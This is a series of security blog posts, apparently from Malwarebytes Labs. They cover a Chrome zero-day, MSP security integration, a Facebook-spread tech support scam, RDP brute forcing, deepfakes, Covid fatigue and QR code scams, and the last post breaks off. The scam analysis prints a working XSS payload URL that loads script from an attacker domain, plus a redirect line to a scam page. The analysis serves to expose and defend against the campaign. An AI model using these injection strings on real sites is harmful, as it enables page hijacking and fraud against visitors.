IT News

Google has recently released Chrome version 86.0.4240.111 to patch several holes. One is for a zero-day flaw – that means a vulnerability that is being actively exploited in the wild.

The flaw, which is officially designated as CVE-2020-15999, occurs in the way FreeType handles PNG images embedded in fonts using the Load_SBit_Png function. FreeType is a popular text rendering library that Chrome uses. According to the bug report filed by Sergei Glazunov, a security researcher from Google’s very own Project Zero team, the function has the following tasks:

1) Obtains the image width and height from the header as 32-bit integers.
2) Truncates the obtained values to 16 bit and stores them in a ‘TT_SBit_Metrics’ structure.
3) Uses the truncated values to calculate the bitmap size.
4) Allocates the backing store of that size. 5) Passes ‘png_struct’ and the backing store to a libpng function.

Glazunov further explains that since the libpng function uses 32-bit values instead of the truncated 16-bit values, a heap buffer overflow in FreeType could occur if the PNG’s width and/or height exceeds 65535, the highest possible allocated buffer or memory for this type of data. This would result in certain pieces of data being overwritten or corrupted and, overall, the program behaving differently. So, anyone who successfully exploits this bug could either allow remote execution of malicious code in the context of the browser or a complete compromise of the affected system.

Google didn’t further elaborate on how CVE-2020-15999 is being exploited to target its users, or who is possibly behind the exploitation.

Update your Chrome now

Chrome users are advised to update to the current browser version, 86.0.4240.111, to protect themselves from getting exploited. Development teams who use the same FreeType libraries should update to FreeType 2.10.4.

The post Google patches actively exploited zero-day bug that affects Chrome users appeared first on Malwarebytes Labs.

For modern Managed Service Providers (MSPs), gone are the days of disparate workflows, and that’s really for the best.

Imagine trying to run a successful MSP business today—finding potential customers, procuring new clients, developing purchase orders, managing endpoints, and sending invoices—all without the help of Remote Monitoring and Management (RMM) and Professional Services Automation (PSA) tools. It would be ludicrous.

Why then should MSPs accept that another critical part of their daily workload does not integrate with their current product workstack—cybersecurity?

The short answer is they shouldn’t. With an increasingly complex threat landscape which includes evolving ransomware strategies and trickier phishing scams, MSPs need to be on their A-game. Further, as Malwarebytes Labs showed, medium-sized and enterprise businesses suffered dramatic hits to their cybersecurity postures due to the coronavirus pandemic, and the small businesses that many MSPs protect are likely suffering similar pains. 

The very nature of the MSP business demands integration. MSPs should ask the same from their cybersecurity solutions, allowing them to streamline their endpoint security practice with automated endpoint detection and deployment, advanced remediation, and simplified administration.

Why integration helps MSPs and their clients

MSPs today have likely been bombarded by the same arguments favoring RMM and PSA software—these products save time and make money. RMM tools mean no more driving to a physical site, no more scheduled check-ins where a client may have zero IT issues or a critical IT issue that only drags a team down for the rest of the day, and no more unreliability. Remotely addressing a client’s needs is a necessary component of today’s workload.

PSAs offer similar benefits in different areas. These tools can take disparate data flows and collate them into one source of truth. They can automate the generation and hand-off of data to prevent any human error from, for instance, an MSP’s marketing team to its sales team. These tools can also take vital billing data and transform it into trustworthy invoices, making sure that the countless hours of hard work get counted. And they can document purchase orders and make them easily accessible to every MSP employee that needs them. These tools can, in effect, remove the silos of chaos.

These benefits are obvious, and they help not just MSPs, but the clients that MSPs protect.

Being able to immediately field an IT request ticket from a client helps that client, increases their satisfaction, and lets them get back to their job more quickly. Automatically compiling service agreements for multiple clients means fewer opportunities for lost details or mistakes.

These things just make sense. But for MSPs, one of the most crucial roles they perform for clients can sometimes fall beyond the scope of most PSAs. That’s cybersecurity.

Benefits of cybersecurity integration

Every expert MSP knows that their job is more than just fixing IT issues as they happen. It’s also helping clients prevent computer issues before they can have a chance to occur. This doesn’t just help the clients, either, but it helps the many MSP tech workers already slammed with daily requests.

For an MSP, the more endpoints it manages that are already protected with a strong cybersecurity solution, the more endpoints that MSP won’t have to worry about, which means the more time that employees can devote full, personalized attention to the clients suffering other computer issues.

Unfortunately, while RMM and PSA tools have been the standard for decades, the integration with cybersecurity software into these tools is more recent. For years now, MSPs have been forced to sometimes go back to the disparate setups that their industry helped solve—logging into multiple applications to manage the same endpoint.

It didn’t make sense more than 10 years ago and it doesn’t make sense today.

MSPs should consider cybersecurity solutions that integrate directly with their PSA and RMM tools to prevent this repeated splintering of a workload.

Further, having an integrated cybersecurity solution can help an MSP better protect its clients. The integration will allow an MSP to more easily recommend that cybersecurity solution for clients when drafting up service agreements, and a protected client is just as important for the client as it is for the MSP helping them.

After all, so much of the job is cybersecurity, and that means protecting an endpoint before an attack hits, not just after.

The right, always-on, integrated cybersecurity solution will protect clients and their endpoints from disruptive ransomware attacks, sneaky phishing scams, unsafe websites injected with harmful code like credit card skimmers, and dangerous attachments sent through malicious emails. And when something does sneak through? MSPs can then easily rely on their RMM and PSA platforms to get a master-level view of what’s gone wrong, addressing and fixing the issue without having to navigate separate applications with potentially different logins, user interfaces, and data export settings.

There’s no reason to go back to disparate workflows. The MSP industry has been there, and it’s rightfully moved beyond it.

It should do the same when picking a cybersecurity solution for both itself and its clients.

The post The value of cybersecurity integration for MSPs appeared first on Malwarebytes Labs.

Tech support browser lockers continue to be one of the most common web threats. Not only are they a problem for end users who might end up on the phone with scammers defrauding them of hundreds of dollars, they’ve also caused quite the headache for browser vendors to fix.

Browser lockers are only one element of a bigger plan to redirect traffic from certain sites, typically via malvertising chains from adult portals or sites that offer pirated content.

There’s a slightly different campaign that we’ve been tracking for several weeks due to its high volume. Threat actors are relying on Facebook to distribute malicious links that ultimately redirect to a browser locker page. Their approach is interesting because it involves a few layers of deception including abusing a cross-site scripting vulnerability (XSS) on a popular website.

Malicious links shared via Facebook

Links posted onto social media platforms should always be scrutinized as they are a commonly abused way for scammers and malware authors to redirect users onto undesirable content. For this reason, you might see a disclaimer when you click on a link, warning you that it could be spam or dangerous.

The campaign we looked at appears to exclusively use links posted on Facebook, which is fairly unusual considering that traditionally tech support scams are spread via malvertising. Facebook displays a warning for the user to confirm that they want to follow the link. In this case, the destination is further obscured by the fact that the link is a bit.ly shortened URL.

The threat actor is using the bit.ly URL shortener to craft the first stage of redirection. In total, we catalogued 50 different bit.ly links (see IOCs) over a 3 month period, suggesting that there is regular rotation to avoid blacklisting.

Although we do not know exactly how these links are being shared with Facebook users, we have some indication that certain games (i.e. apps on the Facebook site) may help to spread them. Because this is out of our reach, we have alerted Facebook in case it is able to identify the exact source.

Abuse of cross-site scripting vulnerability

The bit.ly URL triggers the second stage redirection that involves a Peruvian website (rpp[.]pe) which contains a cross-site scripting vulnerability (XSS) that allows for an open redirect. Threat actors love to abuse open redirects as it gives some legitimacy to the URL they send victims. In this instance, the news site is perfectly legitimate and draws over 23 million visits a month.

In this case, we can see that code is being passed into the URL in order to load external JavaScript code from buddhosi[.]com, a malicious domain controlled by the attackers.

rpp[.]pe/buscar?q=hoy%3Cscript%20src=%27https://buddhosi[.]com/210c/
?zg1lx5u0.js%27%3E%3C/script%3E&fbclid={removed}

The JavaScript in turn creates the redirection to the browlock landing page by using the replace() method:

top.location.replace('https://BernetteJudeTews[.]club/home/anette/?
nr=855-472-1832&'+window.location.search.substring(1));

Besides redirecting users to other sites, an attacker could exploit the XSS to rewrite the current page into anything they like.

We reported this issue to Grupo RPP but have not heard back at the time of publication.

Cloaking domains

The open redirect trick is something that was added later on in the campaign. Originally the threat actors were directly loading decoy cloaking domains. Their purpose is to check incoming traffic and only serve the malicious content to legitimate victims. This is a very common practice and we’ve seen this before, for example with fake recipe sites.

We documented 6 domains involved in this third stage of the redirection process:

buddhosi[.]com
joinspinclass[.]com
suddhosi[.]com
thourwiringus[.]com
totalgodin[.]com
tuoliushigao[.]com

Server-side checks ensure visitors meet the requirements, namely a legitimate US residential IP address, and custom JavaScript is then served (an empty JavaScript is returned for non-interesting traffic).

The code (shared above) loads the browser locker landing page to one of the disposable and randomly-named domains using one of the newer TLDs:

.casa
.site
.space
.club
.icu
.bar

We collected close to 500 such domains (see IOCs) during a period of a few months, but there are likely many more.

Browser locker at the end of the chain

The browser locker fingerprints the user to display the appropriate version for their browser. It shows an animation mimicking a scan of current system files and threatens to delete the hard drive after five minutes.

Of course this is all fake, but it’s convincing enough that some people will call the toll-free number for assistance. In all, we collected almost 40 different phone numbers (see IOCs) but this is not an exhaustive list.

This is where it ends for the traffic scheme, but where it truly begins for the tech support scam. We did not make contact with the call centre, but we know very well how this next part plays out.

Malwarebytes users were already protected against this browser locker, thanks to our Browser Guard web protection. We will continue to track and report this campaign.

Thanks to Marcelo Rivero for helping with the replay and Manuel Caballero for his insights on the XSS.

Indicators of Compromise

Bitly links

Cloaking domains

buddhosi[.]com
joinspinclass[.]com
suddhosi[.]com
thourwiringus[.]com
totalgodin[.]com
tuoliushigao[.]com

Browlock domains

Phone numbers

The post XSS to TSS: tech support scam campaign abuses cross-site scripting vulnerability appeared first on Malwarebytes Labs.

While leaving your back door open while you are working from home may be something you do without giving it a second thought, having unnecessary ports open on your computer is a security risk that is sometimes underestimated. That’s because an open port can be subject to brute force attacks.

What are brute force attacks?

A brute force attack is where an attacker tries every way he can think of to get in. Including throwing the kitchen sink at it. In cases where the method they are trying is to get logged in to your system, they will try endless combinations of usernames and passwords until a combination works.

Brute force attacks are usually automated, so it doesn’t cost the attacker a lot of time or energy. Certainly not as much as individually trying to figure out how to access a remote system. Based on a port number or another system specific property, the attacker picks the target and the method and then sets his brute force application in motion. He can then move on to the next target and will get notified when one of the systems has swallowed the hook.

Brute force methods

When trying to gain access to a remote system, an attacker will use one of these different types of attacks:

• Reverse brute force attack. This type uses a common password or collection of passwords against many possible usernames. Sometimes the attacker may have an idea about the username or a part thereof. For example, they may know that a specific organization uses {first name}@{organization} as the default username for their employees. The attacker can then try a specific list of usernames and random passwords.
• Credential stuffing is a type of attack where the criminal has a database of valid username and password combinations (usually stolen from other breaches) and tries out all these combinations on different systems. This is why it is never a good idea to reuse your passwords.
• A hybrid brute force attack starts with the most feasible combinations and then keeps on trying from there. It often uses a dictionary attack where the application tries usernames or passwords using a dictionary of possible strings or phrases.
• Rainbow table attacks only work when the attacker has some knowledge about the password they are trying to guess. In these attacks rainbow tables are used to recover a password based on its hash value. A rainbow table is a hash function used in cryptography for storing important data such as passwords in a database.

Brute forcing RDP ports

RDP attacks are one of the main entry points when it comes to targeted ransomware operations. To increase effectiveness, ransomware attacks are getting more targeted and one of the primary attack vectors is the Remote Desktop Protocol (RDP). Remote desktop is exactly what the name implies, an option to remotely control a computer system. It almost feels as if you were actually sitting behind that computer. Which is exactly what makes an attacker with RDP access so dangerous.

Because of the current pandemic, many people are working from home and may be doing so for a while to come. Working from home has the side effect of more RDP ports being opened. Not only to enable the workforce to access company resources from home, but also to enable IT staff to troubleshoot problems on the workers’ devices. A lot of enterprises rely on tech support teams using RDP to troubleshoot problems on employee’s systems.

But ransomware, although prevalent, is not the only reason for these types of attacks. Cybercriminals can also install keyloggers or other spyware on target systems to learn more about the organization they have breached. Other possible objectives might be data theft, espionage, or extortion.

Protect against brute force attacks

We’ve posted recommendations to protect against RDP attacks before. You can read more details in that post but basically the protection measures come down to:

• Limit the number of open ports
• Restrict the access to those that need it
• Enhance security of the port and the protocol

The same basic security measures apply to other ports. In cybersecurity, the term open port refers to a TCP or UDP port number that is configured to accept packets. In contrast, a port which rejects connections or ignores all packets, is a closed port. The less open ports you have facing the internet, the safer it is. Limiting the number of open ports is a good start but closing all of them is almost never feasible.

For the ports that need to remain open and where you do expect visitors, it’s a good idea to disable legacy usernames, rotate passwords, and use 2FA if you can.

Security software guarding the entire network should raise alarm bells when a great number of attempts are detected. Anything that behaves like a brute force attack will look so different from normal login attempts that it shouldn’t be a problem if it is blocked. When a brute force attacker gets locked out for a few minutes after a few failed attempts, this will slow them down a lot and give you ample opportunity to take corrective and defensive measures.

It’s a numbers game

Many open ports can be used in a brute force attack, but RDP ports are the most desirable for anyone trying to gain access. RDP is easier because the attacker may have a reasonable idea about the username and only needs to brute force the password. It also offers a successful attacker a good chance to infiltrate the organization’s network further.

As mentioned earlier, the shift to working from home has caused a big raise in the number of open RDP ports around the globe. The number of RDP ports exposed to the Internet grew from about three million in January 2020 to over four and a half million in March. At Malwarebytes we noticed a similar surge in compromised servers that are used to run brute force tools or scan the Internet for vulnerable ports. Malwarebytes protects its customers by blocking the traffic from these IP addresses.

And please don’t think this can’t happen to your organization. We’ve seen high profile companies fall victim to ransomware where the suspected point of entry was an open RDP port.

Stay safe everyone!

The post Brute force attacks increase due to more open RDP ports appeared first on Malwarebytes Labs.

Last week on Malwarebytes Labs, we looked at journalism’s role in cybersecurity on our Lock and Code podcast, gave tips for safer shopping on Amazon Prime day, and discussed an APT attack springing into life as Academia returned to the real and virtual campus environment. We also dug into potential FIFA 21 scams, the return of QR code scams, Covid fatigue, and the absence of Deepfakes from the 2020 US elections.

Other cybersecurity news

• Coronavirus SMS spoof risk: Researcher warns that genuine messages can be impersonated (Source: The Register)

• Hacked Hackney: Hackney council warns of a “serious cyberattack on council systems” (Source: Hackney Council)
• Football frenzy: Steer clear of FIFA 21 themed gaming scams (Source: Daily Express)
• Expanding the Online Harms bill: Calls for UKGOV to add online scams to the Online Harms Bill, intended to tackle the growing number of problems on the internet (Source: Yahoo News)
• Those scams belong in a museum: Museum Director’s Facebook page used to scam people online (Source: Chicago CBS Local)
• Plugging the virtual gaps: virtual appliance security remains a headache for businesses (Source: Help Net Security)
• Going on the offensive: The problems caused when malware gangs dabble in open source tools (Source: ZDNet)
• A veritable laundry list: group charged with money laundering for malware operations (Source: ZDNet)
• An Office trick or treat: it’s actually just a trick, in the form of fake updates downloading malware (source: Kim Komando)
• Google ramps up assistance: the Advanced Protection Program receives a few upgrades for those in need of it (Source: TechRadar)

Stay safe, everyone!

The post A week in security (October 12 – October 18) appeared first on Malwarebytes Labs.

If you believe reports in the news, impending deepfake disaster is headed our way in time for the 2020 United States election. Political intrigue, dubious clips, mischief and mayhem were all promised. We’ll need to be careful around clips of the President issuing statements about being at war, or politicians making defamatory statements. Everything is up for grabs, and in play, or at stake. Then, all of a sudden…it wasn’t.

Nothing happened. Nothing has continued to happen. Where did our politically charged deepfake mayhem go to? Could it still happen? Is there time? With all the increasingly surreal things happening on a daily basis, would anybody even care?

The answer is a cautious “no, they probably wouldn’t.” As we’ve mentioned previously, there are two main schools of thought on this. Shall we have a quick refresher?

Following the flow

Stance 1: Catastrophe and chaos rain down from the heavens. The missiles will launch. Extreme political shenanigans will cause skulduggery and intrigue of the highest order. Democracy as we know it is imperilled. None of us will emerge unscathed. Deepfakes imperil everything.

Stance 2: Deepfakes have jumped the shark. They’d have been effective political tools when nobody knew about them. They’re more useful for subversive influence campaigns off the beaten track. You have to put them in the places you least expect, because people quite literally expect them. They’re yesterday’s news.

Two fairly diverse stances, and most people seem to fall in one of the two camps. As far as the US election goes, what is the current state of play?

2020 US election: current state of play

Imagine our surprise when instead of deepfaked election chaos, we have a poorly distorted gif you can make on your phone. It’s heralded as the first strike of deepfakes “for electioneering purposes”.

It’s dreadful. Something you’d see in the comment section of a Myspace page, as pieces of face smear and warp this way and that. People are willing to call pretty much anything a deepfake to add weight to their points. The knock-on effect of this is overload and gradual disinterest due to hype. Things many would consider a deepfake are turned away at the door as a result of everything in sight being called a deepfake.

This is a frankly ludicrous situation. Even so, outside of the slightly tired clips we’ve already seen, there doesn’t appear to be any election inroad for scammers or those up to no good.

What happened to my US election deepfakes?

The short answer is people seem to be much more taken with pornographic possibilities than bringing down Governments. According to Sensity data, the US is the most heavily targeted nation for deepfake activity. That’s some 45.4%, versus the UK in second place with just 10.4%, South Korea with 9.1%, and India at 5.2%. The most popular targeted sector is entertainment with 63.9%, followed by fashion at 20.4%, and politics with a measly 4.5%.

We’ve seen very few (if any) political deepfakes aimed at South Korean politicians. For all intents and purposes, they don’t exist. What there is an incredible amount of, are pornographic fakes of South Korean K-Pop singers shared on forums and marketplaces. This probably explains South Korea’s appearance in third place overall and is absolutely contributing to the high entertainment sector rating.

Similarly adding to both US and entertainment tallies, are US actresses and singers. Again, most of those clips tend to be pornographic in nature. This isn’t a slow trickle of generated content. It’s no exaggeration to say that one single site will generate pages of new fakes per day, with even more in the private/paid-for sections on their forums.

This is awful news for the actresses and singers currently doomed to find themselves uploaded all over these sites without permission. Politicians, for the most part, get off lightly.

What are we left with?

Besides the half dozen or so clips from professional orgs saying “What if Trump/Obama/Johnson/Corbyn said THIS” with a clip of said politician saying it (and they’re not that great either), it’s basically amateur hour out there. There’s a reasonably consistent drip-feed of parody clips on YouTube, Facebook, and Twitter. It’s not Donald Trump declaring war on China. It isn’t Joe Biden announcing an urgent press briefing about Hilary Clinton’s emails. It’s not Alexandria Ocasio-Cortez telling voters to stay home because the local voting station has closed.

What it is, is Donald Trump and Joe Biden badly lip-syncing their way through Bohemian Rhapsody on YouTube. It’s Trump and Biden talking about a large spoon edited into the shot with voices provided by someone else. I was particularly taken by the Biden/Trump rap battle doing the rounds on Twitter.

As you may have guessed, I’m not massively impressed by what’s on offer so far. If nothing else, one of the best clips for entertainment purposes I’ve seen so far is from RT, the Russian state-controlled news network. 

Big money, minimal returns?

Consider how much money RT must have available for media projects, and what they could theoretically sink into something they clearly want to make a big splash with. And yet, for all that…it’s some guy in a Donald Trump wig, with an incredibly obviously fake head pasted underneath it. The lips don’t really work, the face floats around the screen a bit, evidently not sharing the same frame of reference as the body. The voice, too, has a distinct whiff of fragments stitched together.

So, a convincing fake? Not at all. However, is that the actual aim? Is it deliberately bad, so they don’t run a theoretical risk of getting into trouble somehow? Or is this quite literally the best they can do?

If it is, to the RT team who put it together: I’m sorry. Please, don’t cry. I’m aiming for constructive criticism here.

They’re inside the walls

Curiously, instead of a wave of super-dubious deepfakes making you lose faith in the electoral system, we’ve ended up with…elected representatives slinging the fakes around instead.

By fakes, I don’t mean typical “cheapfakes”, or photoshops. I mean actual deepfakes.

Well, one deepfake. Just one.

“If our campaign can make a video like this, imagine what Putin is doing right now”

Bold words from Democratic candidate Phil Ehr, in relation to a deepfake his campaign team made showing Republican Matt Gaetz having a political change of heart. He wants to show how video and audio manipulation can influence elections and other important events.

Educating the public in electioneering shenanigans is certainly a worthwhile goal. Unfortunately, I have to highlight a few problems with the approach:

1. People don’t watch things from start to finish. Whole articles go unread beyond the title and maybe the first paragraph. TV shows progress no further than the first ad break. People don’t watch ad breaks. It’s quite possible many people will get as far as Matt Gaetz saying how cool he thinks Barack Obama is, then abandon ship under the impression it was all genuine.
2. “If we can make a video like this” implies what you’re about to see is an incredible work of art. It’s terrible. The synthetic Matt Gaetz looks like he wandered in off the set of a Playstation 3 game. The voice is better, but still betrayed by that halting, staccato lilt so common in audio fakery. One would hope the visuals being so bad would take care of 1), but people not really paying attention or with a TV on in the background are in for a world of badly digitised hurt.

An acceptable use of technology?

However you stack this one up, I think it’s broadly unhelpful to normalise fakes in this way during election cycles regardless of intention. Note there’s also no “WARNING: THIS IS FAKE” type message at the start of the clip. This is bad, considering you can detach media from Tweets and repurpose.

It’s the easiest thing in the world to copy the code for the video and paste it into your own Tweet minus his disclaimer. You could just as easily download it, edit out the part at the end which explains the purpose, and put it back on social media platforms. There’s so many ways you can get up to mischief with a clip like this it’s not even funny.

Bottom line: I don’t think this is a good idea.

Fakes in different realms

Other organisations have made politically-themed fakes to cement the theoretical problems posed by deepfakes during election time, and these ones are actually quite good. You can still see the traces of uncanny valley in there though, and we must once again ask: is it worth the effort? When major news cycles rotate around things as basic as conspiracy theories and manipulation, perhaps fake Putin isn’t the big problem here.

If you were in any doubt as to where the law enforcement action is on this subject: it’s currently pornography. Use of celebrity faces in deepfakes is now officially attracting the attention of the thin blue line. You can read more on deepfake threats (political or otherwise) in this presentation by expert Kelsey Farish.

Cleaning up the house

That isn’t to say things might not change. Depending on how fierce the US election battle is fought, strange deepfake things could still be afoot at the eleventh hour. Whether it makes any difference or not is another thing altogether, and if low-grade memes or conspiracy theories are enough to get the job done then that’s what people will continue to do.

Having said that: you can keep a watchful eye on possible foreign interference in the US election via this newly released attribution tracker. Malign interference campaigns will probably continue as the main driver of GAN generated imagery. Always be skeptical, regardless of suspicions over AI involvement. The truth is most definitely out there…it just might take a little longer to reach than usual.

The post Deepfakes and the 2020 United States election: missing in action? appeared first on Malwarebytes Labs.

After six months of social distancing, sheltering in place, working from home, distance learning, mask-wearing, hand-washing, and plenty of hand-wringing, people are pretty damn tired of COVID-19. And with no magic bullet (yet) and no end in sight, annoyance has turned into exasperation and even desperation.

Doctors and mental health professionals call this Covid fatigue.

Covid fatigue, not to be confused with fatigue as a symptom of the COVID-19 infection, can be characterized by denial, defeatism, and careless or reckless behavior in response to feeling overwhelmed and exhausted by a constant stream of pandemic-related information. And since COVID-19’s impact on our lives has been both profound and long-lasting, the fatigue is further pronounced by such prolonged exposure to intense stress. Conflicting information about the seriousness of the virus does little to provide relief. Instead, emotions are extra muddied by uncertainty about how stressed we should really be feeling.

Those of us in cybersecurity recognize this emotional response well. We’ve seen it play out in the digital realm in the form of security fatigue and alert fatigue, or what some doctors call “caution fatigue.” And we understand that if it isn’t addressed, it can lead to dangerous choices for the health and safety of people in the real world and online.

COVID-19 has upended nearly every facet of our lives, driving us into the open arms of the Internet like never before. Yet, as we struggle with anxiety and burnout related to the pandemic, our fatigue spills over into our online behavior. And with so many working and schooling from home, the stakes have never been higher.

So, when we see users exhibiting classic symptoms of Covid fatigue, security fatigue, or other caution fatigue, we feel their pain but recognize that this behavior can’t go on unchecked. If you think that you, your friends and family, or coworkers might be experiencing Covid fatigue, read on to learn how to recognize the symptoms, why they are dangerous, and what can be done to fight against it.

What is Covid fatigue?

To understand Covid fatigue, it helps to first zoom out and consider that fatigue is a natural response to any ongoing stressful situation or threat. When you couple that with the need to take specific actions to protect against that threat, you get caution fatigue. In an interview for a WebMD special report, Jacqueline Gollan, Associate Professor of Psychiatry and Behavioral Science at Northwestern’s Feinberg School of Medicine, explains what she means by the term caution fatigue:

“[Caution fatigue] is really low motivation or interest in taking safety precautions. It occurs because the constant state of being [on] alert for a threat can activate a stress hormone called cortisol, and that can affect our health and our brain function…When we’re subjected to high levels of stress, we start to desensitize to that stress. And then we begin to pay less attention to risky situations.”

Caution fatigue, then, can apply to numerous situations where individuals are under siege for an extended period of time and grow tired of being required to employ protective measures. This is especially true when the threat is not perceived as imminent or direct, and even more prominent when the threat is invisible. Other factors that increase caution fatigue include:

• Lack of transparency into the threat or the reasons for the restrictions
• Unfair or overly complicated restrictions or recommendations for safety precautions
• Inconsistent actions and mixed messages about which measures are effective
• Unpredictable changes to safety measures, including using subjective criteria to alter directions

Looking at this list in the context of the coronavirus pandemic, it appears we’ve checked off all the boxes, turning what was strong public support for COVID-19 response strategies into a collective case of the Mondays. According to an October report by the World Health Organization (WHO), pandemic fatigue has reached over 60 percent in some parts of Europe. In the United States, a July 2020 Kaiser Family Foundation poll found that 53 percent of Americans believed the pandemic had harmed their mental health.

WHO says that Covid fatigue is expressed through an increasing number of people not sufficiently following recommendations and restrictions, decreasing their effort to stay informed about the pandemic, and having lower risk perceptions related to COVID-19. Previously effective core messages about washing hands, wearing face masks, practicing proper hygiene, and maintaining physical distance may now be lost in the shuffle. Instead, vigilance is replaced by denial (I won’t get infected) or nihilism (we’re all screwed anyway, so I might as well do what I want).

What does Covid fatigue have to do with cybersecurity?

Covid fatigue shares characteristics with another form of fatigue that has long plagued the cybersecurity industry: security fatigue. In 2017, the National Institute of Standards in Technology (NIST) published a study stating that security fatigue was the threshold at which users found it too hard or burdensome to maintain security, a phenomenon affecting 63 percent of its participants.

The NIST report went further to say, “People are told they need to be constantly on alert, constantly ‘doing something,’ but they are not even sure what that something is or what might happen if they do or do not do it.”

Security fatigue and its cousin alert fatigue (which technicians are likely already familiar with) prevent users from taking definitive steps to protect themselves while connected to the Internet. Every news story on ransomware or major breach of personally identifiable information (PII) or cyberattack by a nation-state comes with its own set of “here’s how to protect against this” steps to follow.

Some of those instructions may be complex or incredibly specific, contributing to confusion (especially for those who aren’t tech savvy). Likewise, the constant pinging from alert notifications on security software may result in IT teams dismissing those alerts altogether.

Although there have been efforts to reduce security and alert fatigue, they likely make themselves known on a regular basis to anyone working in IT and security. For other users, security fatigue might flow as an undercurrent or barely register. But when you add Covid fatigue to the recipe, you get a dangerous cocktail of weary indifference.

Now, those with Covid fatigue aren’t just endangering themselves by ignoring best health practices and tuning out the latest news. They’re also letting their fatigue-influenced behavior spill over into other areas, including conducting business (or pleasure) online.

Because COVID-19 has forced much of the globe to spend a lot more time online, it has opened up the floodgates for cybercriminal activity, misinformation, and digital infection. Here, at the crossroads of Covid, security, and alert fatigue, people might find themselves in just as much danger on the Internet as they would be at a packed rally of maskless, cheering crowds.

Caroline Wong, CSO of pentest-as-a-service company Cobalt, recently spoke to Malwarebytes employees at a virtual fireside chat about Covid fatigue.

“One of the things that I worry about the most is anxiety and burnout and what that means for human error,” she said. “When we’re anxious, maybe we’re more likely to fall for a phishing scam. When I’m burnt out, maybe I’m more likely to purposefully or accidentally take some kind of a shortcut. Every behavior of an employee affects the security posture of the company.”

And behaviors have changed drastically for both users and cybercriminals since the onset of COVID-19. Here are a few examples of how threat actors are taking advantage of fatigued users:

• Now that more people are shopping online to avoid crowded stores, cybercriminals have stepped up their credit card skimming efforts on legitimate sites. In just the first month of sheltering in place, digital skimming was up 26 percent. Users were previously told that a site secured by “https” and a lock icon should be safe. Those rules are now out the window.
• Threat actors have weaponized information on COVID-19, using it as a hook to lure phishing victims, from SBA scams to nation-state espionage. Just consuming information about COVID-19 from the wrong source, then, could compromise users’ safety.
• Students are distance learning, often on their own devices. And parents/individuals are mostly working from home, again using their (unprotected) personal devices to conduct work, or work devices to conduct personal errands. Cybercriminals look to capitalize on these risky choices by targeting employees on insecure devices and infiltrating business/school networks in the process.

“I think the biggest threat from Covid fatigue comes down to the massive distraction it causes,” said Adam Kujawa, Director of Malwarebytes Labs. “People who are so desperate for hope might scrutinize less and end up falling into a trap or exposing themselves to cyberthreats, just for the idea of relief.”

Combine this with the general malaise brought on by Covid fatigue, and you get an exponentially higher chance of infecting your home and business networks, rendering your devices obsolete, having your PII stolen and sold on the black market, opening the door for nation-state actors to spy on your organization, or even inviting threat actors to seize company files and ransom them for a hefty price.

How to fight Covid fatigue

If one of the symptoms of fatigue is feeling overwhelmed by a heavy dose of information and advice about what to do to combat a threat, how do you go about giving important information and advice about what to do to combat that threat? One method would be to consider the factors that are causing stress and fatigue and then deliver simple, actionable instructions to counter those factors. For example, if a constantly changing outlook on the future of the pandemic and other mixed messages are creating anxiety, consider only visiting a small selection of websites to find answers.

In researching for this article, I came across dozens of different recommendations for combatting Covid and security fatigue. Rather than overwhelm readers with too many choices, I opted to boil down all instructions to the three most pertinent. For battling Covid fatigue, try:

1. Turning to a coping mechanism. Take a five minute break from the screen or TV if COVID-19 news is getting you down. If you need more time, spend it consumed in a favorite hobby to re-energize.
2. Lowering your expectations. This may sound crude, but what it really means is give yourself a break. If you’re forgetting words or taking a long time to complete a project, forgive yourself. And if you think a vaccine will definitely be here in January 2021, perhaps consider placing your hopes elsewhere.
3. Talking to someone. COVID-19 has been isolating for all of us. When loneliness strikes, schedule a virtual happy hour with a close friend, jump on a phone call with family members, or book an appointment with a trusted counselor.

In addition, remember these key preventative measures for keeping the virus at bay, recommended by leading scientists:

1. Wear a mask in public. That includes not just stores and workplaces, but at any gathering with people outside your household.
2. Wash your hands frequently. Especially after being around other people or handling any objects that came from outside your home.
3. Practice social distancing. When in doubt, stay at least six feet away from others. Refrain from gathering in large groups, especially indoors in poorly-ventilated areas.

And finally, to ensure you don’t let Covid fatigue transform into security fatigue, remember these three important rules:

1. Use a password manager. To avoid re-using passwords across accounts or having to remember 27 different ones, a password manager will keep your account credentials encrypted inside a digital vault, which can only be opened by a single master password. For extra protection, employ multi-factor authentication.
2. Use security software on all of your devices, including your mobile phone. (iPhones don’t allow for external antivirus protection, but they do let users download robocall blockers and apps that secure mobile browsers.)
3. Use common sense. We’ve learned that “trust but verify” doesn’t work for the Internet. If it seems too good to be true…you know the rest.

The post How Covid fatigue puts your physical and digital health in jeopardy appeared first on Malwarebytes Labs.

Just when we thought the QR code was on its way out, the pandemic has led to a return of the scannable shortcut. COVID-19 has meant finding a digital equivalent to things normally handed out physically, like menus, tour guides, and other paperwork, and many organizations have adopted the QR code to help with this. And so, it would seem, have criminals. Scammers have dusted off their book of tricks that abuse QR codes, and we’re starting to see new scams. Or maybe just old scams in new places.

What is a QR code again?

A quick recap for those that missed it. A Quick Response (QR) code is nothing more than a two-dimensional barcode. This type of code was designed to be read by robots that keep track of items in a factory. As a QR code takes up a lot less space than a legacy barcode, its usage soon spread.

Smartphones can easily read QR codes—all it takes is a camera and a small piece of software. Some apps, like banking apps, have QR code-reading software incorporated to make it easier for users to make online payments. In some other cases, QR codes are used as part of a login procedure.

QR codes are easy to generate and they are hard to tell apart. To most human eyes, they all look the same. More or less like this:

Why are QR codes coming back?

For some time, these QR codes were mainly in use in industrial environments to help keep track of inventory and production. Later they gained some popularity among advertisers because it was easier for consumers to scan a code than to type a long URL. But people couldn’t tell from a QR code where scanning would lead them, so they got cautious and QR codes started to disappear. Then along came the pandemic and entrepreneurs had to get creative about protecting their customers against a real life virus infection.

To name an example, for fear of spreading COVID-19 through many people touching the same menu in a restaurant, businesses placed QR codes on their tables so customers could scan the code and open the menu in the browser on their phone. Clean and easy. Unless a previous visitor with bad intentions had replaced the QR code with his own. Enter QR code scams.

Some known QR code scams

The easiest QR code scam to pull off is clickjacking. Some people get paid to lure others into clicking on a certain link. What better way than to replace QR codes on a popular monument, for example, where people expect to find background information about the landmark by following the link in the QR code. Instead, the replaced QR code takes them to a sleazy site and the clickjacking operator gets paid his fee.

Another trick is the small advance payment scam. For some services, it’s accepted as normal to make an advance payment before you can use that service. For example, to rent a shared bike, you are asked to make a small payment to open the lock on the bike. The QR code to identify the bike and start the payment procedure is printed on the bike. But the legitimate QR codes can be replaced by criminals that are happy to receive these small payments into their own account.

